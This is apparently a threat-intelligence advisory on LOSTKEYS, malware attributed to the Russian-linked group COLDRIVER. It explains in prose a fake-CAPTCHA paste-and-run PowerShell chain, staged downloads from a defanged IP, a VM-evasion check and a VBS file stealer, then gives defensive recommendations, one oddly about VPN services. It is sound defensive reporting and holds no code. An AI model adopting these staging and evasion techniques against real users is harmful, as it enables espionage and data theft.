COLDRIVER Deploying LOSTKEYS Malware To Target Governments And NGOs

Summary

Google Cloud has discovered a new malware strain called LOSTKEYS, linked to the Russian government-backed threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto).LOSTKEYS can steal files from specific directories, collect system information, and send active process data to attackers. It was observed in multiple attacks in early 2025 and represents an escalation in COLDRIVER’s capabilities, expanding beyond their usual focus on credential phishing.

COLDRIVER typically targets high-profile individuals, including government and military advisors, journalists, think tanks, and NGOs, often through personal or organizational email accounts. After compromising accounts, they exfiltrate emails and contact lists, and sometimes deploy malware like LOSTKEYS to access local files.

The group's operations appear to support Russian strategic intelligence goals, with recent campaigns continuing to focus on individuals connected to Ukraine. COLDRIVER has also been linked to limited hack-and-leak operations targeting officials and organizations in the UK.

Technical Analysis

LOSTKEYS is deployed at the final stage of a multi-step infection chain that begins with a lure website featuring a fake CAPTCHA. After the user “verifies” the CAPTCHA, a PowerShell command is automatically copied to their clipboard, and the site instructs the user to paste and run the command using the Windows “Run” prompt.

Figure 1 - Fake CAPTCHA verification (Source – Google Cloud)

The initial PowerShell script that is pasted will download and execute the second stage. In several observed instances, the second stage was retrieved from the IP address 165.227.148[.]68.

The second stage computes the MD5 hash of the device's display resolution, and if the hash matches one of three specific values, it halts execution. If the hash is different, it proceeds to retrieve the third stage. This step is likely intended to avoid execution in virtual machines. Each observed instance of this infection chain uses distinct, unique identifiers that must be included in the request to obtain the next stage. In all cases, the third stage is retrieved from the same host as the previous stages.

The third stage of the infection chain involves a Base64-encoded blob, which, when decoded, reveals additional PowerShell code. This code is responsible for retrieving and decoding the final payload. It does so by downloading two more files from the same host as the previous stages, each using unique identifiers for each infection chain.

The first file is a Visual Basic Script (VBS) referred to as the "decoder," which decodes the second file. The decoding process uses two unique keys per infection chain. One key is embedded in the decoder, while the second key is stored in the third stage. These keys are applied in a substitution cipher to decode the payload, and each infection chain uses different keys.

The final outcome of the infection chain is a Visual Basic Script (VBS) known as LOSTKEYS. This malware is designed to steal files from a predefined list of file extensions and directories, as well as to transmit system information and details about running processes to the attacker.

Figure 2 – LOSTKEYS infection flow (Source – Google Cloud)

During the investigation, two additional samples dating back to December 2023 were identified, both leading to the execution of LOSTKEYS. Unlike the recent infection chain, these samples are Portable Executable (PE) files masquerading as Maltego software. It remains unclear whether these older samples are linked to COLDRIVER or if the malware was reused from another source.

Recommendations

• The initial infiltration is taking place via phishing websites. It is crucial to only download and install software applications from well-known and trusted sources.

• Conduct awareness campaigns to educate users about the risks of phishing attacks and the importance of verifying the authenticity of VPN services.

• Deploy advanced endpoint protection solutions that can detect and block malicious scripts and payloads across different operating systems. Ensure that these solutions are updated regularly to identify and mitigate new threats.

• Use network security tools to monitor and block communications with known Command and Control (C&C) servers. Implement firewalls and intrusion detection systems to detect and prevent unauthorized access.

• Enable MFA on all accounts to add an extra layer of security and reduce the risk of unauthorized access even if credentials are compromised.

• Develop and maintain an incident response plan to quickly address and mitigate the impact of malware infections. Regularly test and update the plan to ensure effectiveness.

Conclusion

The discovery of LOSTKEYS highlights a significant evolution in COLDRIVER’s capabilities, shifting from credential phishing to more sophisticated malware deployment. The multi-stage infection chain, tailored identifiers, and use of evasion techniques indicate a well-resourced and adaptive threat actor. While the origins of earlier samples remain uncertain, the consistent goal appears to be intelligence collection in support of Russian strategic interests.